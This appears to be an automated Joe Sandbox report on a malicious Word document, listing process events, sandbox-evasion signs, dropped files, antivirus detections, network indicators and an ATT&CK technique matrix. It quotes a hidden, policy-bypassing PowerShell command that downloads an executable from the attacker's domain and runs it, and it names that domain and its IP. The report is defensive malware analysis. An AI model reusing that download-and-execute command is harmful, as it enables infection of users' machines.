Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\file.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Roaming\file.exeRDTSC instruction interceptor: First address: 0000000007043C85 second address: 0000000007043C85 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4EECA62E1Fh 0x00000006 test ch, FFFFFFD8h 0x00000009 test edx, D75238D0h 0x0000000f inc ebp 0x00000010 test ecx, edx 0x00000012 inc ebx 0x00000013 rdtsc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1580Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1696Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 912Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dll
Source: C:\Users\user\AppData\Roaming\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dll
Source: C:\Users\user\AppData\Roaming\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\file.exeAPI coverage: 8.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004065CE FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004027AA FindFirstFileA,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004065CE FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004027AA FindFirstFileA,
Source: C:\Users\user\AppData\Roaming\file.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: file.exe, 00000015.00000002.1283718581.00000000005D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_73C22288 GlobalFree,lstrcpyA,GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\notepad.exeInjected file: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT VolumeInformation
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Command and Scripting Interpreter
Path Interception1
Access Token Manipulation
1
Masquerading
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium11
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts2
Scripting
Boot or Logon Initialization Scripts111
Process Injection
1
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop Protocol1
Clipboard Data
Exfiltration Over Bluetooth2
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Native API
Logon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Shared Modules
Logon Script (Mac)Logon Script (Mac)1
Access Token Manipulation
NTDS1
Remote System Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer13
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud Accounts33
Exploitation for Client Execution
Network Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets3
File and Directory Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable Media3
PowerShell
Rc.commonRc.common1
Deobfuscate/Decode Files or Information
Cached Domain Credentials114
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Scripting
DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Obfuscated Files or Information
Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Behavior Graph (ID 829399, sample TEPO0015922.doc, start date 18/03/2023, architecture WINDOWS, score 100)

Source | Detection | Scanner | Label
TEPO0015922.doc | 23% | ReversingLabs | Script.Trojan.Woreflint
TEPO0015922.doc | 42% | Virustotal |
Source | Detection | Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe | 6% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsnC988.tmp\System.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nss4AE7.tmp\System.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\Anabiotic\Farvelgninger\Satires\ZedGraph.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\httputility.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes\libgdk_pixbuf-2.0-0.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\file.exe | 6% | ReversingLabs
Source | Detection | Scanner | Label
9.0.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
21.0.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
6.2.powershell.exe.36dfce5.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.2.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
21.2.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
16.0.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
9.2.file.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
Source | Detection | Scanner
thekaribacruisecompany.com | 0% | Virustotal
Source | Detection | Scanner | Label
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
httPs://thekaribacruisecompany.c | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://thekaribacruisecompany.com | 0% | Avira URL Cloud | safe
httPs://thekaribacruisecompany.com/file.exePE | 0% | Avira URL Cloud | safe
httPs://thekaribacruisecompany.com/file.exePEQ | 0% | Avira URL Cloud | safe
httPs://thekaribacruisecompany.com/file.exe | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
thekaribacruisecompany.com | 149.102.154.62 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://thekaribacruisecompany.com/file.exe | false | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
httPs://thekaribacruisecompany.c | powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_Error | file.exe, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmp | false | | high
http://crl.entrust.net/server1.crl0 | powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.entrust.net03 | powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
httPs://thekaribacruisecompany.com/file.exePE | powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
httPs://thekaribacruisecompany.com/file.exePEQ | powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
httPs://thekaribacruisecompany.com/file.exe | powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleaner | powershell.exe, 0000000C.00000002.925602681.00000000001B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://thekaribacruisecompany.com | powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | file.exe, 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000009.00000000.921928467.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmp | false | | high
http://ocsp.entrust.net0D | powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/Yg | powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://secure.comodo.com/CPS0 | powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.entrust.net/2048ca.crl0 | powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.102.154.62 | thekaribacruisecompany.com | United States | 174 | COGENT-174US | true
                  Joe Sandbox Version:37.0.0 Beryl
                  Analysis ID:829399
                  Start date and time:2023-03-18 05:34:14 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 11m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:25
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:TEPO0015922.doc
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winDOC@29/33@2/1
                  EGA Information:
                  • Successful, ratio: 75%
                  HDC Information:
                  • Successful, ratio: 75.9% (good quality ratio 74.7%)
                  • Quality average: 87.8%
                  • Quality standard deviation: 20.7%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .doc
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
